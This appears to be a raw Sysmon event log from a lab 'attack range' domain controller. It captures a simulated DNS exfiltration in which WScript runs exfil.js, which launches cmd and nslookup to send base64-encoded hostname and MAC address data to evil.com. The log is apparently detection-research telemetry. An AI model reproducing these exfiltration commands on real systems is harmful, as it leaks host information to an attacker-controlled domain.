14:21:43.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.454{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.454{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4945-000000005F02}6216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.454{2E1864BB-18E0-629A-6742-000000005F02}39762516C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-4945-000000005F02}6216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.462{2E1864BB-18F7-629A-4945-000000005F02}6216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgoyf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.454{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldpf.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.439{2E1864BB-18F7-629A-4745-000000005F02}7396908C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4845-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4845-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{2E1864BB-18F7-629A-4645-000000005F02}22366224C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-4845-000000005F02}6512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.435{2E1864BB-18F7-629A-4845-000000005F02}6512C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-4645-000000005F02}2236C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldpf.tmp 2>&1 10341000x8000000000000000212998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.407{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4745-000000005F02}7396C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.407{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4745-000000005F02}7396C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.407{2E1864BB-18F7-629A-4745-000000005F02}7396908C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4645-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4745-000000005F02}7396C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4645-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-18E0-629A-6742-000000005F02}39767824C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-4645-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.400{2E1864BB-18F7-629A-4645-000000005F02}2236C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldpf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.392{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfudg.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.370{2E1864BB-18F7-629A-4445-000000005F02}74128160C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4545-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\W